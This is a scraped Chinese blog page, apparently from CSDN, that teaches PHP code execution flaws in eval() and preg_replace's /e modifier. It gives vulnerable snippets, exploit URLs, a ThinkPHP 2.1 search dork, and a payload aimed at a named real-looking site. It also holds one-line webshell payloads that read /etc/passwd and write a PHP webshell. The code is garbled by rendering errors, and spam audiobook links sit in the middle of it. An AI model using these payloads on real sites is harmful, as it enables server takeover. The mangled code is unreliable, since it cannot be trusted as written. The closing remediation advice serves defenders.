例子 PHP CMS中 settings的内容: array

最新推荐文章于 2021-07-22 11:10:47 发布
最新推荐文章于 2021-07-22 11:10:47 发布
阅读量238 收藏
点赞数

内容
1、代码执行漏洞的概述
2、代码执行漏洞的危害
3、代码执行漏洞的利用
4、代码执行漏洞的防御

背景介绍
在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用eval函数(PHP函数)去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。

例子
PHP CMS中 settings的内容:

array(
‘upload_maxsize’ => ‘2048’,
‘upload_allowext’ => ‘jpg|jpeg|gif|bmp|png|doc|docx|xls|xlsx|ppt|pptx|pdf|txt|rar|zip|swf’,
‘watermark_enable’ => ‘1’,
‘watermark_minwidth’ => ‘300’,
‘watermark_minheight’ => ‘300’,
‘watermark_img’ => ‘/statics/images/water/mark.png’,
‘watermark_pct’ => ‘85’,
‘watermark_quality’ => ‘80’,
‘watermark_pos’ => ‘9’ ,
)
1
2
3
4
5
6
7
8
9
10
11
PHP CMS中 很常用的string2array函数:

function string2array(KaTeX parse error: Expected '}', got 'EOF' at end of input: data){ if(data == ‘’){
return array();
}
eval("$array = $data;")
return $array;
}
1
2
3
4
5
6
7
PHP CMS中 很常用的string2array函数:

<?php $data = "array('a'=>'aaaa', 'b'=>'222222', 'c'=>'',111=>phpinfo(),222=>'22' )"; eval("\$arr = $data;"); ?>

1
2
3
4
5
6
7
其实settings是一个字符串形式的“PHP数组”,这里必须使用eval函数才能将“字符串”变成一个真正的数组。

漏洞危害

执行任意代码
向网站写WebShell
控制整个网站甚至服务器
相关函数

eval()
assert()
preg_replace() + /e 模式
create_function()
array_map()
call_user_func()/call_user_func_array()
array_filter()
usort(),uasort()
file_put_contents()
fputs()
G E T [ ‘ a ’ ] ( _GET[‘a’]( GET[a](_GET[‘b’]);//a=assert&b=phpinfo()
think2.1
//

$string = ‘google 123, 456’;
$pattern = ‘/(\w+) (\d+), (\d+)/i’;
$replacement = 'runoob 2 , 3 ′ ; e c h o p r e g r e p l a c e ( {2},\\3&#x27;; echo preg_replace( 2,3;echopregreplace(pattern, $replacement, $string);
https://www.ximalaya.com/youshengshu/25246131/
https://www.ximalaya.com/youshengshu/25246127/
https://www.ximalaya.com/youshengshu/25246122/
https://www.ximalaya.com/youshengshu/25246115/
https://www.ximalaya.com/youshengshu/25246108/
https://www.ximalaya.com/youshengshu/25246207/
https://www.ximalaya.com/youshengshu/25246202/
https://www.ximalaya.com/youshengshu/25246197/
https://www.ximalaya.com/youshengshu/25246192/
https://www.ximalaya.com/youshengshu/25246188/
https://www.ximalaya.com/youshengshu/25246260/
https://www.ximalaya.com/youshengshu/25246250/
https://www.ximalaya.com/youshengshu/25246246/
https://www.ximalaya.com/youshengshu/25246234/
https://www.ximalaya.com/youshengshu/25246225/
https://www.ximalaya.com/youshengshu/25246295/
https://www.ximalaya.com/youshengshu/25246285/
https://www.ximalaya.com/youshengshu/25246287/
https://www.ximalaya.com/youshengshu/25246282/
https://www.ximalaya.com/youshengshu/25246276/
https://www.ximalaya.com/youshengshu/25255704/
https://www.ximalaya.com/youshengshu/25255694/
https://www.ximalaya.com/youshengshu/25255700/
https://www.ximalaya.com/youshengshu/25255765/
https://www.ximalaya.com/youshengshu/25255772/
输出: runoob 123,456
1
2
3
4
5
6
intext:thinkphp intext:“Fast & Simple OOP PHP Framework” intext:“2.1”
KaTeX parse error: Expected '}', got 'EOF' at end of input: {@print(eval(_POST[1]))}
{KaTeX parse error: Expected '}', got 'EOF' at end of input: {@eval(_POST[1])}}

http://www.ksftea.com/index.php/module/action/param1/KaTeX parse error: Expected '}', got 'EOF' at end of input: {@print(eval(_POST[1]))}

eval()函数漏洞利用_1

<?php $data = $_GET['data']; eval("\$ret = $data;"); echo $ret; ?>

1
2
3
4
5
/?data=phpinfo()
/?data=1;phpinfo()
/?data=${phpinfo()}
eval()函数漏洞利用_2

<?php //关闭魔术方法 $data=$_GET[‘data’]; eval(“\$ret = strtolower(‘$data’);”); echo $ret; ?>

1
2
3
4
5
6
/?data=1’);phpinfo();//
eval()函数漏洞利用_3

<?php $data=$_GET[‘data’]; eval(“\$ret = strtolower(\”$data\”);”); echo $ret; ?>

1
2
3
4
5
/?data=${phpinfo()} (php版本5.5及以上)
/?data=“);phpinfo();//
preg_replace+/e利用

<?php $data=$_GET[‘data’]; echo $data; preg_replace(‘/(.*)<\/data>/e’,‘$ret=“\\1”;’, $data); echo $ret; ?>

1
2
3
4
5
6
php版本在5.5以上

/?data= p h p i n f o ( ) h t t p : / / l o c a l h o s t / b a j i / v u l / e v a l / e 1. p h p ? d a t a = &lt; d a t a &gt; {phpinfo()} http://localhost/baji/vul/eval/e1.php?data=&lt;data&gt; phpinfo()http://localhost/baji/vul/eval/e1.php?data=<data>{assert(KaTeX parse error: Expected 'EOF', got '}' at position 10: _POST[1])}̲</data> 漏洞利用 {{@eval(KaTeX parse error: Expected 'EOF', got '}' at position 10: _POST[1])}̲} 一句话 {{exit(print(getcwd()))}} 获取当前工作路径
{KaTeX parse error: Expected '}', got 'EOF' at end of input: …e_get_contents(_POST[f])))}}
读文件 f=/etc/passwd
{KaTeX parse error: Expected '}', got 'EOF' at end of input: …e_put_contents(_POST[f], $_POST[d])))}}
写webshell f=1.php&d=1111111

漏洞修复方案

对于eval( )函数一定要保证用户不能轻易接触eval的参数或者用正则严格判断输入的数据格式。
对于字符串一定要使用单引号包裹可控代码,并且 插入前进行addslashes().
对于preg_replace放弃使用e修饰符。如果必须要用e修饰符,请保证第二个参数中,对于正则匹配出的对象,用单引号包裹 。

作者:刘三羊
来源:优快云
原文:https://blog.youkuaiyun.com/qq_37133717/article/details/94760485
版权声明:本文为博主原创文章,转载请附上博文链接!

sturgsslecofwe
关注
php漏洞eval,Web安全之代码执行漏洞
weixin_36440677的博客
03-11 1978
原标题:Web安全之代码执行漏洞内容1、代码执行漏洞的概述2、代码执行漏洞的危害3、代码执行漏洞的利用4、代码执行漏洞的防御 背景介绍在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用eval函数(PHP函数)去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。例子PHP CMSsettings内容array('upl...
渗透测试初体验:DC-1靶场
SmileAssassn的博客
08-07 602
渗透测试靶场DC:1,新手练习使用
settings.php,settings.php
weixin_39882589的博客
03-21 361
require "include/bittorrent.php";dbconn();require_once(get_langfile_path());loggedinorreturn();parked();if (get_user_class() < UC_SYSOP)permissiondenied();//read all configuration filesrequire('con...
Django cms项目之setting.py(1)
Aochen的博客
06-01 610
这是我参考了虫师和D-Roger(http://d-roger.com/2016/06/27/hvae/)的文章后自己写的一个cms项目,源码已经上传至GitHub上了,这里写下来总结下: 1.我用的是mysql,所以在站点__init__.py下添加pymysql接口: import pymysql pymysql.install_as_MySQLdb() 2.mysql数
命令执行漏洞
weixin_33798152的博客
12-20 1490
0x01:命令执行漏洞简介用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许使用者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码0x02:命令执行 VS 代码执行1. 命令执行漏洞:直接调用操作系统命令2. 代码执行漏洞:靠执行脚本代码调用操作系统命令命令执行原理: ...
PHP 学习 教程、路线
freeking101的博客
07-26 8999
PHP 学习 教程、路线
WP REST API:内部和自定义
代码教主
06-12 948
在本系列的前一部分中,我们了解了如何通过WP REST API远程创建,更新和删除内容。 它使我们能够创建与平台无关的应用程序,这些应用程序可与WordPress驱动的后端无缝协作,从而为用户提供丰富的体验。 在本系列的当前部分中,我们将研究WP REST API的内部结构以及它们如何共同为API提供动力。 之后,我们将学习修改默认端点的服务器响应以包括自定义字段。 具体来说,在当前文...
精通WORDPRESS设计与开发:第4章 探索WORDPRESS CORE
陈小房的自我修炼
07-22 619
本章内容 ➤探索WordPress内核文件 ➤搜索内核文件作为参考 ➤使用WordPress Codex ➤浏览WordPress代码参考 ➤理解内联文档 要理解如何正确地扩展WordPress,首先必须了解WordPress Core功能。这将帮助你了解WordPress Core中有哪些工具可以让你的生活更轻松。WordPress为你处理了大部分繁琐的编码和逻辑问题。WordPress Core是学习WordPress如何工作的最好资源。开源软件的美妙之处在于您可以使用所有的代码。如果你..
CMS扩展开发宝典】:打造独特功能模块的开发完整指南
本文对内容管理系统(CMS)扩展开发进行了全面的概述,从基础架构和开发准备工作开始,涵盖了理论知识学习、开发工具和资源的准备,再到功能模块的设计、开发、测试和部署的完整过程。文章强调了模块设计原则、...
Joomla下利用configuration.php存储简单数据
10-29
在Joomla内容管理系统(CMS)中,`configuration.php`文件是一个关键的部分,它包含了网站的基本配置信息,如数据库连接参数、站点URL等。利用`configuration.php`存储简单数据是一种常见的做法,尤其在需要持久保存...
Drupal内容策略实施:高效内容管理和分发的策略
首先,介绍了内容策略的重要性及其在Drupal中的理论基础,涵盖内容类型、工作流设计及多渠道分发策略。随后,深入讨论了内容组织、元数据管理、编辑协作流程以及性能监控和优化技巧。接着,分析了个性化内容分发、多...
CMS-CMS框架解析
u014695894的博客
02-22 9864
        今天第一次接触到CMS的项目,当时是修改一个别人项目的BUG,说实话,我开始并不了解这是一个开源框架,我开始以为是一个别人字节写的自用框架,而非公共的开源框架。其实本人也写过微框架,本次就借助CMS来谈谈框架的思想。  框架的本质      框架的本质,自我理解就是从URL输入到数据处理到数据输出的过程,如果输出的是页面HTML则是传统的MVC模式,如果输出的是JSON的数据集...
自动驾驶规划与控制算法详解:从Apollo 6.0 EMplanner到PID、模糊控制、LQR、MPC
05-27
内容概要:本文深入探讨了自动驾驶领域的规划与控制算法,重点介绍了Apollo 6.0的EMplanner规划模块和常用的控制算法如PID、模糊控制、LQR、MPC。规划部分涵盖了路径规划、决策制定、安全性、效率和实时性的实现;控制部分详细解析了各控制算法的原理及其在自动驾驶中的应用。此外,作者还分享了丰富的实践经验,强调了实践、安全、灵活运用算法和持续学习的重要性。 适合人群:对自动驾驶技术感兴趣的工程师、研究人员及即将进入该领域的毕业生。 使用场景及目标:①理解和掌握自动驾驶规划与控制的基本原理和技术;②对比不同控制算法的特点和应用场景;③获取宝贵的行业经验和职业发展指导。 其他说明:本文不仅提供了理论知识,还结合了大量实际工作经验,有助于读者更好地应对技术和职业挑战。
### 【大数据技术】Hadoop、Flink、Hive、Spark、Kafka、Zookeeper、HBase安装与配置指南:构建分布式集群系统
05-27
内容概要:本文档详细介绍了在三台CentOS 7服务器(IP地址分别为192.168.0.157、192.168.0.158和192.168.0.159)上安装和配置Hadoop、Flink及其他大数据组件(如Hive、MySQL、Sqoop、Kafka、Zookeeper、HBase、Spark、Scala)的具体步骤。首先,文档说明了环境准备,包括配置主机名映射、SSH免密登录、JDK安装等。接着,详细描述了Hadoop集群的安装配置,包括SSH免密登录、JDK配置、Hadoop环境变量设置、HDFS和YARN配置文件修改、集群启动与测试。随后,依次介绍了MySQL、Hive、Sqoop、Kafka、Zookeeper、HBase、Spark、Scala和Flink的安装配置过程,包括解压、环境变量配置、配置文件修改、服务启动等关键步骤。最后,文档提供了每个组件的基本测试方法,确保安装成功。 适合人群:具备一定Linux基础和大数据组件基础知识的运维人员、大数据开发工程师以及系统管理员。 使用场景及目标:①为大数据平台搭建提供详细的安装指南,确保各组件能够顺利安装和配置;②帮助技术人员快速掌握Hadoop、Flink等大数据组件的安装与配置,提升工作效率;③适用于企业级大数据平台的搭建与维护,确保集群稳定运行。 其他说明:本文档不仅提供了详细的安装步骤,还涵盖了常见的配置项解释和故障排查建议。建议读者在安装过程中仔细阅读每一步骤,并根据实际情况调整配置参数。此外,文档中的命令和配置文件路径均为示例,实际操作时需根据具体环境进行适当修改。
欧姆龙CJCP程序在锂电池贴胶检测线中的PLC通信与多机协同控制方案
最新发布
05-27
内容概要:本文详细介绍了欧姆龙CJ/CP系列程序在全自动CE锂电池贴胶检测机中的应用。该系统基于欧姆龙CP1H-XA主机和CIF串口模块,实现了高效的PLC通信与多机协同操作。主要功能包括轴控制、一键换型、故障记录、产量统计及OEE计算等。此外,还提供了优质的触摸屏程序模板和多种可重复调用的功能块,如气缸报警、真空报警和轴实时位置脉冲转毫米功能块。整条生产线由四台不同功能的机器组成,配备四套PLC和触摸屏程序,采用八套主从站控制,确保系统的高可靠性和强大适应性。 适合人群:从事工业自动化领域的工程师和技术人员,特别是对PLC编程和控制系统有需求的专业人士。 使用场景及目标:适用于需要构建高效稳定的锂电池贴胶检测生产线的企业。目标是提高生产效率、减少停机时间、优化资源配置并提升产品质量。 其他说明:文中不仅提供了详细的硬件配置介绍,还包括具体的梯形图和ST代码示例,帮助读者更好地理解和实施相关技术。
音乐APP界面设计素材Music App ui设计psd源文件.rar
05-27
音乐APP界面设计素材Music App ui设计psd源文件.rar
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值